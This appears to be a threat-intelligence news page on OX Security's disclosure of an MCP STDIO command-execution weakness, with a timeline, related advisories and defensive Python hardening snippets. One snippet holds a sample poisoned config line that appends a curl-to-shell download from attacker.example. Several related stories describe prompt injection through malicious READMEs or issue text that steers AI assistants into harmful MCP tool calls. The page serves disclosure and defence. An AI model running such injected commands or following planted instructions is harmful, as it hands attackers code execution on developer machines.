Mallory

Anthropic MCP STDIO Design Flaw Enables RCE Across AI Tooling

ai-platform-security · remote-access-implant · build-pipeline-compromise · internet-exposed-service · leaked-secret-api-key
Updated May 1, 2026 at 02:01 AM · 4 sources

Researchers at OX Security disclosed a design-level weakness in Anthropic’s Model Context Protocol (MCP) that can allow arbitrary OS command execution through unsafe STDIO transport behavior, creating a broad AI supply-chain risk. The flaw is reported to propagate through Anthropic’s official MCP SDKs into downstream tools and agents, with researchers linking it to at least 10 high- and critical-severity vulnerabilities across widely used projects. Reported impacts include exposure of sensitive data such as API keys, chat histories, internal databases, and developer workstations, while estimates of exposure range from more than 7,000 publicly accessible servers to as many as 200,000 servers potentially at risk.

Affected or cited projects include LangFlow, Flowise, GPT Researcher, Upsonic, Windsurf, Claude Code, Cursor, Gemini-CLI, GitHub Copilot, LiteLLM, and LettaAI. OX Security said it began reporting the issue to Anthropic in late 2025, but Anthropic reportedly treated the behavior as expected and responded by updating its security guidance rather than changing the protocol architecture. Researchers described four main abuse paths: direct command injection, hardening bypass, zero-click or near-zero-click prompt injection in AI IDEs and coding assistants, and malicious MCP marketplace submissions that can execute commands on developer machines. They urged organizations to restrict public exposure, sandbox MCP-enabled services, treat external MCP configurations as untrusted, monitor MCP tool use, and install MCP servers only from verified sources.
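
The direct command-injection path comes down to how a host launches an STDIO server from configuration it did not author. Below is a minimal sketch of the risky pattern and one mitigation; the server command and allowlist names are hypothetical, illustrating the vulnerability class rather than code from any affected project:

```python
import shlex

# Hypothetical MCP server entry pulled from an external (untrusted) config.
# The command-injection class arises when a host interpolates such a field
# into a shell command line.
untrusted_server_cmd = "uvx my-mcp-server; curl http://attacker.example/x | sh"

# UNSAFE pattern (illustrative only): shell interpolation runs both commands.
#   subprocess.run(untrusted_server_cmd, shell=True)

# Safer pattern: tokenize without a shell and enforce a launcher allowlist.
ALLOWED_LAUNCHERS = {"uvx", "npx", "python"}

def spawn_stdio_server_argv(cmdline: str) -> list[str]:
    argv = shlex.split(cmdline)  # ';' and '|' stay literal tokens, not operators
    if not argv or argv[0] not in ALLOWED_LAUNCHERS:
        raise ValueError(f"launcher not allowlisted: {argv[:1]}")
    return argv  # would be passed to subprocess.Popen(argv, shell=False)
```

With `shell=False`, shell metacharacters embedded in a poisoned config become inert arguments; the allowlist then rejects launchers such as `bash -c` outright.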

Timeline

  1. Apr 20, 2026

    Public disclosure warns MCP flaw threatens AI supply chain

    In April 2026, OX Security publicly disclosed the architectural weakness, warning it could put thousands of publicly accessible MCP servers and software packages with more than 150 million downloads at risk. The disclosure framed the issue as a broader AI supply-chain problem because the insecure behavior propagated through Anthropic's official MCP SDKs into many downstream projects.

  2. Apr 20, 2026

    Vendors issue patches for some affected MCP ecosystem projects

    Several downstream vendors released fixes for vulnerabilities tied to the MCP design weakness in their own products. However, Anthropic itself had not changed the underlying protocol architecture, according to the researchers.

  3. Apr 16, 2026

    Researchers link MCP flaw to 10 vulnerabilities across AI tools

    OX Security connected the protocol design issue to at least 10 high- and critical-severity CVEs or vulnerabilities affecting MCP-based tools and AI agents, including products such as LangFlow, Flowise, Windsurf, Claude Code, Cursor, Gemini-CLI, GitHub Copilot, LiteLLM, and LettaAI-related tooling. The researchers said the weakness created multiple exploit classes, including command injection, hardening bypass, prompt injection, and malicious marketplace package abuse.

  4. Apr 16, 2026

    Anthropic updates guidance but keeps MCP architecture unchanged

After receiving the reports, Anthropic reportedly treated the STDIO behavior as expected rather than a protocol flaw. Instead of changing the MCP architecture, it updated its security guidance to caution developers about the use of STDIO adapters.

  5. Nov 1, 2025

    OX Security begins disclosing MCP STDIO design flaw to Anthropic

    OX Security said it first reported a design-level weakness in Anthropic's Model Context Protocol beginning in November 2025. The issue centered on unsafe STDIO transport behavior that could enable arbitrary OS command execution in downstream MCP implementations.
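
Since the mitigations above are guidance-level rather than protocol changes, one way to act on the "sandbox MCP-enabled services" recommendation is to launch STDIO servers with a scrubbed environment, so a compromised or malicious server cannot read API keys inherited from the host process. This is a generic hardening sketch under that assumption, not vendor-provided code:

```python
import subprocess

def launch_sandboxed(argv):
    # Minimal environment: the child sees no inherited secrets, no
    # user-writable PATH entries, and no home directory to mine for
    # credentials or dotfiles.
    clean_env = {
        "PATH": "/usr/bin:/bin",
        "HOME": "/nonexistent",
    }
    return subprocess.Popen(
        argv,
        env=clean_env,            # do not inherit API keys / tokens
        shell=False,              # no shell metacharacter interpretation
        stdin=subprocess.PIPE,    # STDIO transport: JSON-RPC over pipes
        stdout=subprocess.PIPE,
    )
```

Environment scrubbing addresses only the credential-exposure impact; OS-level sandboxing (containers, seccomp, filesystem isolation) is still needed to constrain what the process can do.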


Related Stories

Prompt-injection chain enables code execution in Anthropic’s Git MCP server

Anthropic fixed three vulnerabilities in its official *Git MCP server* (`mcp-server-git`) that could be triggered via **prompt injection** and chained with other MCP tools to achieve **remote code execution** or destructive file operations. The issues were reported by agentic AI security firm **Cyata**, which demonstrated that attacker-controlled content an AI assistant might read (for example, a malicious `README`, poisoned issue text, or other untrusted context) could drive the LLM to invoke MCP tool calls with crafted arguments, enabling exploitation without the attacker having direct access to the victim host. Cyata identified `CVE-2025-68143` (**unrestricted `git_init`**), `CVE-2025-68145` (**path validation bypass**), and `CVE-2025-68144` (**argument injection in `git_diff`**). In combination—particularly when `mcp-server-git` is used alongside the *Filesystem MCP server*—the flaws could enable code execution, arbitrary file deletion/overwrite, and reading arbitrary files into the LLM context (with Cyata noting this does not inherently provide direct exfiltration). The vulnerabilities affected default deployments of `mcp-server-git` prior to **version `2025.12.18`**; Anthropic was notified in June and shipped fixes in December, and there was no indication reported that the bugs were exploited in the wild.
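
Argument injection of the `git_diff` kind typically arises when model-supplied strings land in positions where git parses them as options. A generic mitigation sketch (not Anthropic's actual fix, and the function name here is hypothetical) is to reject option-like refs and terminate option parsing with `--`:

```python
import subprocess

def safe_git_diff(repo_dir: str, ref: str, paths: list[str]) -> str:
    # Reject anything option-like in the ref position, and use "--" so
    # model-supplied paths can never be parsed as git flags such as
    # --output=<file> or --ext-diff.
    if ref.startswith("-"):
        raise ValueError(f"refusing option-like ref: {ref!r}")
    argv = ["git", "-C", repo_dir, "diff", ref, "--", *paths]
    return subprocess.run(argv, capture_output=True, text=True,
                          check=True).stdout
```

Passing arguments as a list (no shell) plus the `--` separator closes both the shell-injection and option-injection channels for the path arguments; the explicit ref check covers the one position `--` cannot protect.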

1 month ago
AI Developer Tool Vulnerabilities in Cursor IDE and AWS MCP Components

Multiple disclosures highlighted **security weaknesses in AI development tooling and Model Context Protocol (MCP) ecosystems**, including a Proofpoint-reported *Cursor IDE* deeplink abuse technique and AWS advisories for flaws in MCP-related components. Proofpoint described **"CursorJack"** as a social-engineering-driven abuse of the `cursor://` protocol handler that, in tested configurations, could let an attacker trigger arbitrary command execution or install a malicious remote MCP server after a user click and prompt acceptance. The report emphasized that developers are high-value targets because their workstations often hold credentials and privileged access, and noted the default UI did not clearly distinguish malicious MCP install deeplinks from legitimate ones. AWS separately disclosed two **distinct vulnerabilities** affecting its AI and MCP tooling rather than the same Cursor issue. **CVE-2026-4270** affects the *AWS API MCP Server* in versions `>= 0.2.14` and `< 1.3.9`, where alternate-path handling could bypass intended file access restrictions and expose arbitrary local file contents in the MCP client context; AWS fixed the issue in version `1.3.9` and credited Varonis Threat Labs. **CVE-2026-4269** affects the *Bedrock AgentCore Starter Toolkit* before `v0.1.13`, where missing S3 ownership verification could allow remote code injection during the build process and lead to code execution in the AgentCore Runtime. These disclosures include affected versions, impact, and remediation guidance, but they describe distinct issues rather than a single incident.
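
The file-access bypass attributed to the AWS API MCP Server reportedly involved alternate path handling. A common generic defense against that class (a sketch, not AWS's published fix) is to resolve symlinks, `..` segments, and alternate spellings before comparing a candidate path against the allowed root:

```python
import os

def is_within_root(root: str, candidate: str) -> bool:
    # Canonicalize both sides before comparing, so alternate forms such as
    # "subdir/../../etc/passwd" or an absolute "/etc/passwd" cannot slip
    # past a naive string-prefix check.
    real_root = os.path.realpath(root)
    real_path = os.path.realpath(os.path.join(root, candidate))
    return os.path.commonpath([real_root, real_path]) == real_root
```

`os.path.commonpath` compares whole path components, avoiding the classic prefix bug where `/allowed-evil` passes a `startswith("/allowed")` check.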

1 month ago
Model Context Protocol (MCP) Security Risks From Untrusted Tool Servers and Verifiability Gaps

Security researchers warned that the *Model Context Protocol (MCP)*—used to let AI assistants connect to local tools and enterprise SaaS data—creates a significant attack surface when organizations install or authorize MCP “servers” and tool integrations. Praetorian highlighted that **locally hosted MCP servers run with the user’s privileges** and can therefore execute arbitrary commands, access local files, install malware, and exfiltrate data while masquerading as legitimate productivity tooling; it also described **“MCP server chaining,”** where a malicious local MCP server abuses data and actions flowing through a trusted remote integration (e.g., Slack/Google Drive) without needing to compromise the official provider. Separately, Gopher Security emphasized a **trust and auditability gap** in MCP deployments: standard logging for remote tool execution can be incomplete or tampered with, and organizations often cannot prove what code ran or what parameters were used inside a remote “black box” execution environment. The post described “puppet”/interception-style scenarios where an attacker could alter an MCP request (e.g., changing tool-call parameters to trigger data exfiltration or unauthorized actions) while returning plausible “success” responses, and proposed cryptographic approaches (e.g., **zero-knowledge proofs**) to make MCP tool execution verifiable rather than relying on mutable logs.
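
Short of the zero-knowledge-proof approaches proposed above, the mutable-log problem can be narrowed with a hash-chained record of tool calls, where each entry commits to its predecessor so silent edits become detectable. This is a generic tamper-evidence sketch, not any vendor's implementation:

```python
import hashlib
import json

def append_tool_call(chain: list[dict], tool: str, params: dict) -> dict:
    # Each entry's hash covers the previous entry's hash, so editing or
    # deleting an earlier tool call breaks every later link in the chain.
    prev = chain[-1]["hash"] if chain else "0" * 64
    body = json.dumps({"tool": tool, "params": params, "prev": prev},
                      sort_keys=True)
    entry = {"tool": tool, "params": params, "prev": prev,
             "hash": hashlib.sha256(body.encode()).hexdigest()}
    chain.append(entry)
    return entry

def verify_chain(chain: list[dict]) -> bool:
    prev = "0" * 64
    for e in chain:
        body = json.dumps({"tool": e["tool"], "params": e["params"],
                           "prev": prev}, sort_keys=True)
        if e["prev"] != prev or e["hash"] != hashlib.sha256(
                body.encode()).hexdigest():
            return False
        prev = e["hash"]
    return True
```

A hash chain makes retroactive tampering evident but does not prove what the remote "black box" actually executed; it only constrains what the logger can later deny, which is why the researchers point toward cryptographic execution proofs for the stronger guarantee.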

Today
